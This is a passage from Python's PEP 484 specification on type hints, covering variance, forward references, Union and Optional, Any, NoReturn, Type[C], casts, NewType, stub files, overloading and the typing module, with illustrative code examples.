Consider a class Employee with a subclass Manager. Now +suppose we have a function with an argument annotated with +List[Employee]. Should we be allowed to call this function with a +variable of type List[Manager] as its argument? Many people would +answer “yes, of course” without even considering the consequences. +But unless we know more about the function, a type checker should +reject such a call: the function might append an Employee instance +to the list, which would violate the variable’s type in the caller.

+

It turns out such an argument acts contravariantly, whereas the +intuitive answer (which is correct in case the function doesn’t mutate +its argument!) requires the argument to act covariantly. A longer +introduction to these concepts can be found on Wikipedia and in PEP 483; here we just show how to control +a type checker’s behavior.

+

By default generic types are considered invariant in all type variables, +which means that values for variables annotated with types like +List[Employee] must exactly match the type annotation – no subclasses or +superclasses of the type parameter (in this example Employee) are +allowed.

+

To facilitate the declaration of container types where covariant or +contravariant type checking is acceptable, type variables accept keyword +arguments covariant=True or contravariant=True. At most one of these +may be passed. Generic types defined with such variables are considered +covariant or contravariant in the corresponding variable. By convention, +it is recommended to use names ending in _co for type variables +defined with covariant=True and names ending in _contra for that +defined with contravariant=True.

+

A typical example involves defining an immutable (or read-only) +container class:

+
from typing import TypeVar, Generic, Iterable, Iterator
+
+T_co = TypeVar('T_co', covariant=True)
+
+class ImmutableList(Generic[T_co]):
+    def __init__(self, items: Iterable[T_co]) -> None: ...
+    def __iter__(self) -> Iterator[T_co]: ...
+    ...
+
+class Employee: ...
+
+class Manager(Employee): ...
+
+def dump_employees(emps: ImmutableList[Employee]) -> None:
+    for emp in emps:
+        ...
+
+mgrs = ImmutableList([Manager()])  # type: ImmutableList[Manager]
+dump_employees(mgrs)  # OK
+
+
+

The read-only collection classes in typing are all declared +covariant in their type variable (e.g. Mapping and Sequence). The +mutable collection classes (e.g. MutableMapping and +MutableSequence) are declared invariant. The one example of +a contravariant type is the Generator type, which is contravariant +in the send() argument type (see below).

+

Note: Covariance or contravariance is not a property of a type variable, +but a property of a generic class defined using this variable. +Variance is only applicable to generic types; generic functions +do not have this property. The latter should be defined using only +type variables without covariant or contravariant keyword arguments. +For example, the following example is +fine:

+
from typing import TypeVar
+
+class Employee: ...
+
+class Manager(Employee): ...
+
+E = TypeVar('E', bound=Employee)
+
+def dump_employee(e: E) -> None: ...
+
+dump_employee(Manager())  # OK
+
+
+

while the following is prohibited:

+
B_co = TypeVar('B_co', covariant=True)
+
+def bad_func(x: B_co) -> B_co:  # Flagged as error by a type checker
+    ...
+
+
+
+
+

The numeric tower

+

PEP 3141 defines Python’s numeric tower, and the stdlib module +numbers implements the corresponding ABCs (Number, +Complex, Real, Rational and Integral). There are some +issues with these ABCs, but the built-in concrete numeric classes +complex, float and int are ubiquitous (especially the +latter two :-).

+

Rather than requiring that users write import numbers and then use +numbers.Float etc., this PEP proposes a straightforward shortcut +that is almost as effective: when an argument is annotated as having +type float, an argument of type int is acceptable; similar, +for an argument annotated as having type complex, arguments of +type float or int are acceptable. This does not handle +classes implementing the corresponding ABCs or the +fractions.Fraction class, but we believe those use cases are +exceedingly rare.

+
+
+

Forward references

+

When a type hint contains names that have not been defined yet, that +definition may be expressed as a string literal, to be resolved later.

+

A situation where this occurs commonly is the definition of a +container class, where the class being defined occurs in the signature +of some of the methods. For example, the following code (the start of +a simple binary tree implementation) does not work:

+
class Tree:
+    def __init__(self, left: Tree, right: Tree):
+        self.left = left
+        self.right = right
+
+
+

To address this, we write:

+
class Tree:
+    def __init__(self, left: 'Tree', right: 'Tree'):
+        self.left = left
+        self.right = right
+
+
+

The string literal should contain a valid Python expression (i.e., +compile(lit, '', 'eval') should be a valid code object) and it +should evaluate without errors once the module has been fully loaded. +The local and global namespace in which it is evaluated should be the +same namespaces in which default arguments to the same function would +be evaluated.

+

Moreover, the expression should be parseable as a valid type hint, i.e., +it is constrained by the rules from the section Acceptable type hints +above.

+

It is allowable to use string literals as part of a type hint, for +example:

+
class Tree:
+    ...
+    def leaves(self) -> List['Tree']:
+        ...
+
+
+

A common use for forward references is when e.g. Django models are +needed in the signatures. Typically, each model is in a separate +file, and has methods taking arguments whose type involves other models. +Because of the way circular imports work in Python, it is often not +possible to import all the needed models directly:

+
# File models/a.py
+from models.b import B
+class A(Model):
+    def foo(self, b: B): ...
+
+# File models/b.py
+from models.a import A
+class B(Model):
+    def bar(self, a: A): ...
+
+# File main.py
+from models.a import A
+from models.b import B
+
+
+

Assuming main is imported first, this will fail with an ImportError at +the line from models.a import A in models/b.py, which is being +imported from models/a.py before a has defined class A. The solution +is to switch to module-only imports and reference the models by their +_module_._class_ name:

+
# File models/a.py
+from models import b
+class A(Model):
+    def foo(self, b: 'b.B'): ...
+
+# File models/b.py
+from models import a
+class B(Model):
+    def bar(self, a: 'a.A'): ...
+
+# File main.py
+from models.a import A
+from models.b import B
+
+
+
+
+

Union types

+

Since accepting a small, limited set of expected types for a single +argument is common, there is a new special factory called Union. +Example:

+
from typing import Union
+
+def handle_employees(e: Union[Employee, Sequence[Employee]]) -> None:
+    if isinstance(e, Employee):
+        e = [e]
+    ...
+
+
+

A type factored by Union[T1, T2, ...] is a supertype +of all types T1, T2, etc., so that a value that +is a member of one of these types is acceptable for an argument +annotated by Union[T1, T2, ...].

+

One common case of union types are optional types. By default, +None is an invalid value for any type, unless a default value of +None has been provided in the function definition. Examples:

+
def handle_employee(e: Union[Employee, None]) -> None: ...
+
+
+

As a shorthand for Union[T1, None] you can write Optional[T1]; +for example, the above is equivalent to:

+
from typing import Optional
+
+def handle_employee(e: Optional[Employee]) -> None: ...
+
+
+

A past version of this PEP allowed type checkers to assume an optional +type when the default value is None, as in this code:

+
def handle_employee(e: Employee = None): ...
+
+
+

This would have been treated as equivalent to:

+
def handle_employee(e: Optional[Employee] = None) -> None: ...
+
+
+

This is no longer the recommended behavior. Type checkers should move +towards requiring the optional type to be made explicit.

+
+
+

Support for singleton types in unions

+

A singleton instance is frequently used to mark some special condition, +in particular in situations where None is also a valid value +for a variable. Example:

+
_empty = object()
+
+def func(x=_empty):
+    if x is _empty:  # default argument value
+        return 0
+    elif x is None:  # argument was provided and it's None
+        return 1
+    else:
+        return x * 2
+
+
+

To allow precise typing in such situations, the user should use +the Union type in conjunction with the enum.Enum class provided +by the standard library, so that type errors can be caught statically:

+
from typing import Union
+from enum import Enum
+
+class Empty(Enum):
+    token = 0
+_empty = Empty.token
+
+def func(x: Union[int, None, Empty] = _empty) -> int:
+
+    boom = x * 42  # This fails type check
+
+    if x is _empty:
+        return 0
+    elif x is None:
+        return 1
+    else:  # At this point typechecker knows that x can only have type int
+        return x * 2
+
+
+

Since the subclasses of Enum cannot be further subclassed, +the type of variable x can be statically inferred in all branches +of the above example. The same approach is applicable if more than one +singleton object is needed: one can use an enumeration that has more than +one value:

+
class Reason(Enum):
+    timeout = 1
+    error = 2
+
+def process(response: Union[str, Reason] = '') -> str:
+    if response is Reason.timeout:
+        return 'TIMEOUT'
+    elif response is Reason.error:
+        return 'ERROR'
+    else:
+        # response can be only str, all other possible values exhausted
+        return 'PROCESSED: ' + response
+
+
+
+
+

The Any type

+

A special kind of type is Any. Every type is consistent with +Any. It can be considered a type that has all values and all methods. +Note that Any and builtin type object are completely different.

+

When the type of a value is object, the type checker will reject +almost all operations on it, and assigning it to a variable (or using +it as a return value) of a more specialized type is a type error. On +the other hand, when a value has type Any, the type checker will +allow all operations on it, and a value of type Any can be assigned +to a variable (or used as a return value) of a more constrained type.

+

A function parameter without an annotation is assumed to be annotated with +Any. If a generic type is used without specifying type parameters, +they are assumed to be Any:

+
from typing import Mapping
+
+def use_map(m: Mapping) -> None:  # Same as Mapping[Any, Any]
+    ...
+
+
+

This rule also applies to Tuple, in annotation context it is equivalent +to Tuple[Any, ...] and, in turn, to tuple. As well, a bare +Callable in an annotation is equivalent to Callable[..., Any] and, +in turn, to collections.abc.Callable:

+
from typing import Tuple, List, Callable
+
+def check_args(args: Tuple) -> bool:
+    ...
+
+check_args(())           # OK
+check_args((42, 'abc'))  # Also OK
+check_args(3.14)         # Flagged as error by a type checker
+
+# A list of arbitrary callables is accepted by this function
+def apply_callbacks(cbs: List[Callable]) -> None:
+    ...
+
+
+
+
+

The NoReturn type

+

The typing module provides a special type NoReturn to annotate functions +that never return normally. For example, a function that unconditionally +raises an exception:

+
from typing import NoReturn
+
+def stop() -> NoReturn:
+    raise RuntimeError('no way')
+
+
+

The NoReturn annotation is used for functions such as sys.exit. +Static type checkers will ensure that functions annotated as returning +NoReturn truly never return, either implicitly or explicitly:

+
import sys
+from typing import NoReturn
+
+  def f(x: int) -> NoReturn:  # Error, f(0) implicitly returns None
+      if x != 0:
+          sys.exit(1)
+
+
+

The checkers will also recognize that the code after calls to such functions +is unreachable and will behave accordingly:

+
# continue from first example
+def g(x: int) -> int:
+    if x > 0:
+        return x
+    stop()
+    return 'whatever works'  # Error might be not reported by some checkers
+                             # that ignore errors in unreachable blocks
+
+
+

The NoReturn type is only valid as a return annotation of functions, +and considered an error if it appears in other positions:

+
from typing import List, NoReturn
+
+# All of the following are errors
+def bad1(x: NoReturn) -> int:
+    ...
+bad2 = None  # type: NoReturn
+def bad3() -> List[NoReturn]:
+    ...
+
+
+
+
+

The type of class objects

+

Sometimes you want to talk about class objects, in particular class +objects that inherit from a given class. This can be spelled as +Type[C] where C is a class. To clarify: while C (when +used as an annotation) refers to instances of class C, Type[C] +refers to subclasses of C. (This is a similar distinction as +between object and type.)

+

For example, suppose we have the following classes:

+
class User: ...  # Abstract base for User classes
+class BasicUser(User): ...
+class ProUser(User): ...
+class TeamUser(User): ...
+
+
+

And suppose we have a function that creates an instance of one of +these classes if you pass it a class object:

+
def new_user(user_class):
+    user = user_class()
+    # (Here we could write the user object to a database)
+    return user
+
+
+

Without Type[] the best we could do to annotate new_user() +would be:

+
def new_user(user_class: type) -> User:
+    ...
+
+
+

However using Type[] and a type variable with an upper bound we +can do much better:

+
U = TypeVar('U', bound=User)
+def new_user(user_class: Type[U]) -> U:
+    ...
+
+
+

Now when we call new_user() with a specific subclass of User a +type checker will infer the correct type of the result:

+
joe = new_user(BasicUser)  # Inferred type is BasicUser
+
+
+

The value corresponding to Type[C] must be an actual class object +that’s a subtype of C, not a special form. In other words, in the +above example calling e.g. new_user(Union[BasicUser, ProUser]) is +rejected by the type checker (in addition to failing at runtime +because you can’t instantiate a union).

+

Note that it is legal to use a union of classes as the parameter for +Type[], as in:

+
def new_non_team_user(user_class: Type[Union[BasicUser, ProUser]]):
+    user = new_user(user_class)
+    ...
+
+
+

However the actual argument passed in at runtime must still be a +concrete class object, e.g. in the above example:

+
new_non_team_user(ProUser)  # OK
+new_non_team_user(TeamUser)  # Disallowed by type checker
+
+
+

Type[Any] is also supported (see below for its meaning).

+

Type[T] where T is a type variable is allowed when annotating the +first argument of a class method (see the relevant section).

+

Any other special constructs like Tuple or Callable are not allowed +as an argument to Type.

+

There are some concerns with this feature: for example when +new_user() calls user_class() this implies that all subclasses +of User must support this in their constructor signature. However +this is not unique to Type[]: class methods have similar concerns. +A type checker ought to flag violations of such assumptions, but by +default constructor calls that match the constructor signature in the +indicated base class (User in the example above) should be +allowed. A program containing a complex or extensible class hierarchy +might also handle this by using a factory class method. A future +revision of this PEP may introduce better ways of dealing with these +concerns.

+

When Type is parameterized it requires exactly one parameter. +Plain Type without brackets is equivalent to Type[Any] and +this in turn is equivalent to type (the root of Python’s metaclass +hierarchy). This equivalence also motivates the name, Type, as +opposed to alternatives like Class or SubType, which were +proposed while this feature was under discussion; this is similar to +the relationship between e.g. List and list.

+

Regarding the behavior of Type[Any] (or Type or type), +accessing attributes of a variable with this type only provides +attributes and methods defined by type (for example, +__repr__() and __mro__). Such a variable can be called with +arbitrary arguments, and the return type is Any.

+

Type is covariant in its parameter, because Type[Derived] is a +subtype of Type[Base]:

+
def new_pro_user(pro_user_class: Type[ProUser]):
+    user = new_user(pro_user_class)  # OK
+    ...
+
+
+
+
+

Annotating instance and class methods

+

In most cases the first argument of class and instance methods +does not need to be annotated, and it is assumed to have the +type of the containing class for instance methods, and a type object +type corresponding to the containing class object for class methods. +In addition, the first argument in an instance method can be annotated +with a type variable. In this case the return type may use the same +type variable, thus making that method a generic function. For example:

+
T = TypeVar('T', bound='Copyable')
+class Copyable:
+    def copy(self: T) -> T:
+        # return a copy of self
+
+class C(Copyable): ...
+c = C()
+c2 = c.copy()  # type here should be C
+
+
+

The same applies to class methods using Type[] in an annotation +of the first argument:

+
T = TypeVar('T', bound='C')
+class C:
+    @classmethod
+    def factory(cls: Type[T]) -> T:
+        # make a new instance of cls
+
+class D(C): ...
+d = D.factory()  # type here should be D
+
+
+

Note that some type checkers may apply restrictions on this use, such as +requiring an appropriate upper bound for the type variable used +(see examples).

+
+
+

Version and platform checking

+

Type checkers are expected to understand simple version and platform +checks, e.g.:

+
import sys
+
+if sys.version_info[0] >= 3:
+    # Python 3 specific definitions
+else:
+    # Python 2 specific definitions
+
+if sys.platform == 'win32':
+    # Windows specific definitions
+else:
+    # Posix specific definitions
+
+
+

Don’t expect a checker to understand obfuscations like +"".join(reversed(sys.platform)) == "xunil".

+
+
+

Runtime or type checking?

+

Sometimes there’s code that must be seen by a type checker (or other +static analysis tools) but should not be executed. For such +situations the typing module defines a constant, +TYPE_CHECKING, that is considered True during type checking +(or other static analysis) but False at runtime. Example:

+
import typing
+
+if typing.TYPE_CHECKING:
+    import expensive_mod
+
+def a_func(arg: 'expensive_mod.SomeClass') -> None:
+    a_var = arg  # type: expensive_mod.SomeClass
+    ...
+
+
+

(Note that the type annotation must be enclosed in quotes, making it a +“forward reference”, to hide the expensive_mod reference from the +interpreter runtime. In the # type comment no quotes are needed.)

+

This approach may also be useful to handle import cycles.

+
+
+

Arbitrary argument lists and default argument values

+

Arbitrary argument lists can as well be type annotated, +so that the definition:

+
def foo(*args: str, **kwds: int): ...
+
+
+

is acceptable and it means that, e.g., all of the following +represent function calls with valid types of arguments:

+
foo('a', 'b', 'c')
+foo(x=1, y=2)
+foo('', z=0)
+
+
+

In the body of function foo, the type of variable args is +deduced as Tuple[str, ...] and the type of variable kwds +is Dict[str, int].

+

In stubs it may be useful to declare an argument as having a default +without specifying the actual default value. For example:

+
def foo(x: AnyStr, y: AnyStr = ...) -> AnyStr: ...
+
+
+

What should the default value look like? Any of the options "", +b"" or None fails to satisfy the type constraint.

+

In such cases the default value may be specified as a literal +ellipsis, i.e. the above example is literally what you would write.

+
+
+

Positional-only arguments

+

Some functions are designed to take their arguments only positionally, +and expect their callers never to use the argument’s name to provide +that argument by keyword. All arguments with names beginning with +__ are assumed to be positional-only, except if their names also +end with __:

+
def quux(__x: int, __y__: int = 0) -> None: ...
+
+quux(3, __y__=1)  # This call is fine.
+
+quux(__x=3)  # This call is an error.
+
+
+
+
+

Annotating generator functions and coroutines

+

The return type of generator functions can be annotated by +the generic type Generator[yield_type, send_type, +return_type] provided by typing.py module:

+
def echo_round() -> Generator[int, float, str]:
+    res = yield
+    while res:
+        res = yield round(res)
+    return 'OK'
+
+
+

Coroutines introduced in PEP 492 are annotated with the same syntax as +ordinary functions. However, the return type annotation corresponds to the +type of await expression, not to the coroutine type:

+
async def spam(ignored: int) -> str:
+    return 'spam'
+
+async def foo() -> None:
+    bar = await spam(42)  # type: str
+
+
+

The typing.py module provides a generic version of ABC +collections.abc.Coroutine to specify awaitables that also support +send() and throw() methods. The variance and order of type variables +correspond to those of Generator, namely Coroutine[T_co, T_contra, V_co], +for example:

+
from typing import List, Coroutine
+c = None  # type: Coroutine[List[str], str, int]
+...
+x = c.send('hi')  # type: List[str]
+async def bar() -> None:
+    x = await c  # type: int
+
+
+

The module also provides generic ABCs Awaitable, +AsyncIterable, and AsyncIterator for situations where more precise +types cannot be specified:

+
def op() -> typing.Awaitable[str]:
+    if cond:
+        return spam(42)
+    else:
+        return asyncio.Future(...)
+
+
+
+
+
+

Compatibility with other uses of function annotations

+

A number of existing or potential use cases for function annotations +exist, which are incompatible with type hinting. These may confuse +a static type checker. However, since type hinting annotations have no +runtime behavior (other than evaluation of the annotation expression and +storing annotations in the __annotations__ attribute of the function +object), this does not make the program incorrect – it just may cause +a type checker to emit spurious warnings or errors.

+

To mark portions of the program that should not be covered by type +hinting, you can use one or more of the following:

+
    +
  • a # type: ignore comment;
  • +
  • a @no_type_check decorator on a class or function;
  • +
  • a custom class or function decorator marked with +@no_type_check_decorator.
  • +
+

For more details see later sections.

+

In order for maximal compatibility with offline type checking it may +eventually be a good idea to change interfaces that rely on annotations +to switch to a different mechanism, for example a decorator. In Python +3.5 there is no pressure to do this, however. See also the longer +discussion under Rejected alternatives below.

+
+
+

Type comments

+

No first-class syntax support for explicitly marking variables as being +of a specific type is added by this PEP. To help with type inference in +complex cases, a comment of the following format may be used:

+
x = []                # type: List[Employee]
+x, y, z = [], [], []  # type: List[int], List[int], List[str]
+x, y, z = [], [], []  # type: (List[int], List[int], List[str])
+a, b, *c = range(5)   # type: float, float, List[float]
+x = [1, 2]            # type: List[int]
+
+
+

Type comments should be put on the last line of the statement that +contains the variable definition. They can also be placed on +with statements and for statements, right after the colon.

+

Examples of type comments on with and for statements:

+
with frobnicate() as foo:  # type: int
+    # Here foo is an int
+    ...
+
+for x, y in points:  # type: float, float
+    # Here x and y are floats
+    ...
+
+
+

In stubs it may be useful to declare the existence of a variable +without giving it an initial value. This can be done using PEP 526 +variable annotation syntax:

+
from typing import IO
+
+stream: IO[str]
+
+
+

The above syntax is acceptable in stubs for all versions of Python. +However, in non-stub code for versions of Python 3.5 and earlier +there is a special case:

+
from typing import IO
+
+stream = None  # type: IO[str]
+
+
+

Type checkers should not complain about this (despite the value +None not matching the given type), nor should they change the +inferred type to Optional[...] (despite the rule that does this +for annotated arguments with a default value of None). The +assumption here is that other code will ensure that the variable is +given a value of the proper type, and all uses can assume that the +variable has the given type.

+

The # type: ignore comment should be put on the line that the +error refers to:

+
import http.client
+errors = {
+    'not_found': http.client.NOT_FOUND  # type: ignore
+}
+
+
+

A # type: ignore comment on a line by itself at the top of a file, +before any docstrings, imports, or other executable code, silences all +errors in the file. Blank lines and other comments, such as shebang +lines and coding cookies, may precede the # type: ignore comment.

+

In some cases, linting tools or other comments may be needed on the same +line as a type comment. In these cases, the type comment should be before +other comments and linting markers:

+
+
# type: ignore # <comment or other marker>
+

If type hinting proves useful in general, a syntax for typing variables +may be provided in a future Python version. (UPDATE: This syntax +was added in Python 3.6 through PEP 526.)

+
+
+

Casts

+

Occasionally the type checker may need a different kind of hint: the +programmer may know that an expression is of a more constrained type +than a type checker may be able to infer. For example:

+
from typing import List, cast
+
+def find_first_str(a: List[object]) -> str:
+    index = next(i for i, x in enumerate(a) if isinstance(x, str))
+    # We only get here if there's at least one string in a
+    return cast(str, a[index])
+
+
+

Some type checkers may not be able to infer that the type of +a[index] is str and only infer object or Any, but we +know that (if the code gets to that point) it must be a string. The +cast(t, x) call tells the type checker that we are confident that +the type of x is t. At runtime a cast always returns the +expression unchanged – it does not check the type, and it does not +convert or coerce the value.

+

Casts differ from type comments (see the previous section). When using +a type comment, the type checker should still verify that the inferred +type is consistent with the stated type. When using a cast, the type +checker should blindly believe the programmer. Also, casts can be used +in expressions, while type comments only apply to assignments.

+
+
+

NewType helper function

+

There are also situations where a programmer might want to avoid logical +errors by creating simple classes. For example:

+
class UserId(int):
+    pass
+
+def get_by_user_id(user_id: UserId):
+    ...
+
+
+

However, this approach introduces a runtime overhead. To avoid this, +typing.py provides a helper function NewType that creates +simple unique types with almost zero runtime overhead. For a static type +checker Derived = NewType('Derived', Base) is roughly equivalent +to a definition:

+
class Derived(Base):
+    def __init__(self, _x: Base) -> None:
+        ...
+
+
+

While at runtime, NewType('Derived', Base) returns a dummy function +that simply returns its argument. Type checkers require explicit casts +from int where UserId is expected, while implicitly casting +from UserId where int is expected. Examples:

+
UserId = NewType('UserId', int)
+
+def name_by_id(user_id: UserId) -> str:
+    ...
+
+UserId('user')          # Fails type check
+
+name_by_id(42)          # Fails type check
+name_by_id(UserId(42))  # OK
+
+num = UserId(5) + 1     # type: int
+
+
+

NewType accepts exactly two arguments: a name for the new unique type, +and a base class. The latter should be a proper class (i.e., +not a type construct like Union, etc.), or another unique type created +by calling NewType. The function returned by NewType +accepts only one argument; this is equivalent to supporting only one +constructor accepting an instance of the base class (see above). Example:

+
class PacketId:
+    def __init__(self, major: int, minor: int) -> None:
+        self._major = major
+        self._minor = minor
+
+TcpPacketId = NewType('TcpPacketId', PacketId)
+
+packet = PacketId(100, 100)
+tcp_packet = TcpPacketId(packet)  # OK
+
+tcp_packet = TcpPacketId(127, 0)  # Fails in type checker and at runtime
+
+
+

Both isinstance and issubclass, as well as subclassing will fail +for NewType('Derived', Base) since function objects don’t support +these operations.

+
+
+

Stub Files

+

Stub files are files containing type hints that are only for use by +the type checker, not at runtime. There are several use cases for +stub files:

+
    +
  • Extension modules
  • +
  • Third-party modules whose authors have not yet added type hints
  • +
  • Standard library modules for which type hints have not yet been +written
  • +
  • Modules that must be compatible with Python 2 and 3
  • +
  • Modules that use annotations for other purposes
  • +
+

Stub files have the same syntax as regular Python modules. There is one +feature of the typing module that is different in stub files: +the @overload decorator described below.

+

The type checker should only check function signatures in stub files; +It is recommended that function bodies in stub files just be a single +ellipsis (...).

+

The type checker should have a configurable search path for stub files. +If a stub file is found the type checker should not read the +corresponding “real” module.

+

While stub files are syntactically valid Python modules, they use the +.pyi extension to make it possible to maintain stub files in the +same directory as the corresponding real module. This also reinforces +the notion that no runtime behavior should be expected of stub files.

+

Additional notes on stub files:

+
    +
  • Modules and variables imported into the stub are not considered +exported from the stub unless the import uses the import ... as +... form or the equivalent from ... import ... as ... form. +(UPDATE: To clarify, the intention here is that only names +imported using the form X as X will be exported, i.e. the name +before and after as must be the same.)
  • +
  • However, as an exception to the previous bullet, all objects +imported into a stub using from ... import * are considered +exported. (This makes it easier to re-export all objects from a +given module that may vary by Python version.)
  • +
  • Just like in normal Python files, submodules +automatically become exported attributes of their parent module +when imported. For example, if the spam package has the +following directory structure:
    spam/
    +    __init__.pyi
    +    ham.pyi
    +
    +
    +

    where __init__.pyi contains a line such as from . import ham +or from .ham import Ham, then ham is an exported attribute +of spam.

    +
  • +
  • Stub files may be incomplete. To make type checkers aware of this, the file +can contain the following code:
    def __getattr__(name) -> Any: ...
    +
    +
    +

    Any identifier not defined in the stub is therefore assumed to be of type +Any.

    +
  • +
+
+

Function/method overloading

+

The @overload decorator allows describing functions and methods +that support multiple different combinations of argument types. This +pattern is used frequently in builtin modules and types. For example, +the __getitem__() method of the bytes type can be described as +follows:

+
from typing import overload
+
+class bytes:
+    ...
+    @overload
+    def __getitem__(self, i: int) -> int: ...
+    @overload
+    def __getitem__(self, s: slice) -> bytes: ...
+
+
+

This description is more precise than would be possible using unions +(which cannot express the relationship between the argument and return +types):

+
from typing import Union
+
+class bytes:
+    ...
+    def __getitem__(self, a: Union[int, slice]) -> Union[int, bytes]: ...
+
+
+

Another example where @overload comes in handy is the type of the +builtin map() function, which takes a different number of +arguments depending on the type of the callable:

+
from typing import Callable, Iterable, Iterator, Tuple, TypeVar, overload
+
+T1 = TypeVar('T1')
+T2 = TypeVar('T2')
+S = TypeVar('S')
+
+@overload
+def map(func: Callable[[T1], S], iter1: Iterable[T1]) -> Iterator[S]: ...
+@overload
+def map(func: Callable[[T1, T2], S],
+        iter1: Iterable[T1], iter2: Iterable[T2]) -> Iterator[S]: ...
+# ... and we could add more items to support more than two iterables
+
+
+

Note that we could also easily add items to support map(None, ...):

+
@overload
+def map(func: None, iter1: Iterable[T1]) -> Iterable[T1]: ...
+@overload
+def map(func: None,
+        iter1: Iterable[T1],
+        iter2: Iterable[T2]) -> Iterable[Tuple[T1, T2]]: ...
+
+
+

Uses of the @overload decorator as shown above are suitable for +stub files. In regular modules, a series of @overload-decorated +definitions must be followed by exactly one +non-@overload-decorated definition (for the same function/method). +The @overload-decorated definitions are for the benefit of the +type checker only, since they will be overwritten by the +non-@overload-decorated definition, while the latter is used at +runtime but should be ignored by a type checker. At runtime, calling +a @overload-decorated function directly will raise +NotImplementedError. Here’s an example of a non-stub overload +that can’t easily be expressed using a union or a type variable:

+
@overload
+def utf8(value: None) -> None:
+    pass
+@overload
+def utf8(value: bytes) -> bytes:
+    pass
+@overload
+def utf8(value: unicode) -> bytes:
+    pass
+def utf8(value):
+    <actual implementation>
+
+
+

NOTE: While it would be possible to provide a multiple dispatch +implementation using this syntax, its implementation would require +using sys._getframe(), which is frowned upon. Also, designing and +implementing an efficient multiple dispatch mechanism is hard, which +is why previous attempts were abandoned in favor of +functools.singledispatch(). (See PEP 443, especially its section +“Alternative approaches”.) In the future we may come up with a +satisfactory multiple dispatch design, but we don’t want such a design +to be constrained by the overloading syntax defined for type hints in +stub files. It is also possible that both features will develop +independent from each other (since overloading in the type checker +has different use cases and requirements than multiple dispatch +at runtime – e.g. the latter is unlikely to support generic types).

+

A constrained TypeVar type can often be used instead of using the +@overload decorator. For example, the definitions of concat1 +and concat2 in this stub file are equivalent:

+
from typing import TypeVar, Text
+
+AnyStr = TypeVar('AnyStr', Text, bytes)
+
+def concat1(x: AnyStr, y: AnyStr) -> AnyStr: ...
+
+@overload
+def concat2(x: str, y: str) -> str: ...
+@overload
+def concat2(x: bytes, y: bytes) -> bytes: ...
+
+
+

Some functions, such as map or bytes.__getitem__ above, can’t +be represented precisely using type variables. However, unlike +@overload, type variables can also be used outside stub files. We +recommend that @overload is only used in cases where a type +variable is not sufficient, due to its special stub-only status.

+

Another important difference between type variables such as AnyStr +and using @overload is that the prior can also be used to define +constraints for generic class type parameters. For example, the type +parameter of the generic class typing.IO is constrained (only +IO[str], IO[bytes] and IO[Any] are valid):

+
class IO(Generic[AnyStr]): ...
+
+
+
+
+

Storing and distributing stub files

+

The easiest form of stub file storage and distribution is to put them +alongside Python modules in the same directory. This makes them easy to +find by both programmers and the tools. However, since package +maintainers are free not to add type hinting to their packages, +third-party stubs installable by pip from PyPI are also supported. +In this case we have to consider three issues: naming, versioning, +installation path.

+

This PEP does not provide a recommendation on a naming scheme that +should be used for third-party stub file packages. Discoverability will +hopefully be based on package popularity, like with Django packages for +example.

+

Third-party stubs have to be versioned using the lowest version of the +source package that is compatible. Example: FooPackage has versions +1.0, 1.1, 1.2, 1.3, 2.0, 2.1, 2.2. There are API changes in versions +1.1, 2.0 and 2.2. The stub file package maintainer is free to release +stubs for all versions but at least 1.0, 1.1, 2.0 and 2.2 are needed +to enable the end user type check all versions. This is because the +user knows that the closest lower or equal version of stubs is +compatible. In the provided example, for FooPackage 1.3 the user would +choose stubs version 1.1.

+

Note that if the user decides to use the “latest” available source +package, using the “latest” stub files should generally also work if +they’re updated often.

+

Third-party stub packages can use any location for stub storage. Type +checkers should search for them using PYTHONPATH. A default fallback +directory that is always checked is shared/typehints/pythonX.Y/ (for +some PythonX.Y as determined by the type checker, not just the installed +version). Since there can only be one package installed for a given Python +version per environment, no additional versioning is performed under that +directory (just like bare directory installs by pip in site-packages). +Stub file package authors might use the following snippet in setup.py:

+
...
+data_files=[
+    (
+        'shared/typehints/python{}.{}'.format(*sys.version_info[:2]),
+        pathlib.Path(SRC_PATH).glob('**/*.pyi'),
+    ),
+],
+...
+
+
+

(UPDATE: As of June 2018 the recommended way to distribute type +hints for third-party packages has changed – in addition to typeshed +(see the next section) there is now a standard for distributing type +hints, PEP 561. It supports separately installable packages containing +stubs, stub files included in the same distribution as the executable +code of a package, and inline type hints, the latter two options +enabled by including a file named py.typed in the package.)

+
+
+

The Typeshed Repo

+

There is a shared repository where useful stubs are being +collected. Policies regarding the stubs collected here will be +decided separately and reported in the repo’s documentation. +Note that stubs for a given package will not be included here +if the package owners have specifically requested that they be omitted.

+
+
+
+

Exceptions

+

No syntax for listing explicitly raised exceptions is proposed. +Currently the only known use case for this feature is documentational, +in which case the recommendation is to put this information in a +docstring.

+
+
+

The typing Module

+

To open the usage of static type checking to Python 3.5 as well as older +versions, a uniform namespace is required. For this purpose, a new +module in the standard library is introduced called typing.

+

It defines the fundamental building blocks for constructing types +(e.g. Any), types representing generic variants of builtin +collections (e.g. List), types representing generic +collection ABCs (e.g. Sequence), and a small collection of +convenience definitions.

+

Note that special type constructs, such as Any, Union, +and type variables defined using TypeVar are only supported +in the type annotation context, and Generic may only be used +as a base class. All of these (except for unparameterized generics) +will raise TypeError if appear in isinstance or issubclass.

+

Fundamental building blocks:

+
    +
  • Any, used as def get(key: str) -> Any: ...
  • +
  • Union, used as Union[Type1, Type2, Type3]
  • +
  • Callable, used as Callable[[Arg1Type, Arg2Type], ReturnType]
  • +
  • Tuple, used by listing the element types, for example +Tuple[int, int, str]. +The empty tuple can be typed as Tuple[()]. +Arbitrary-length homogeneous tuples can be expressed +using one type and ellipsis, for example Tuple[int, ...]. +(The ... here are part of the syntax, a literal ellipsis.)
  • +
  • TypeVar, used as X = TypeVar('X', Type1, Type2, Type3) or simply +Y = TypeVar('Y') (see above for more details)
  • +
  • Generic, used to create user-defined generic classes
  • +
  • Type, used to annotate class objects
  • +
+

Generic variants of builtin collections:

+
    +
  • Dict, used as Dict[key_type, value_type]
  • +
  • DefaultDict, used as DefaultDict[key_type, value_type], +a generic variant of collections.defaultdict
  • +
  • List, used as List[element_type]
  • +
  • Set, used as Set[element_type]. See remark for AbstractSet +below.
  • +
  • FrozenSet, used as FrozenSet[element_type]
  • +
+

Note: Dict, DefaultDict, List, Set and FrozenSet +are mainly useful for annotating return values. +For arguments, prefer the abstract collection types defined below, +e.g. Mapping, Sequence or AbstractSet.

+

Generic variants of container ABCs (and a few non-containers):

+
    +
  • Awaitable
  • +
  • AsyncIterable
  • +
  • AsyncIterator
  • +
  • ByteString
  • +
  • Callable (see above, listed here for completeness)
  • +
  • Collection
  • +
  • Container
  • +
  • ContextManager
  • +
  • Coroutine
  • +
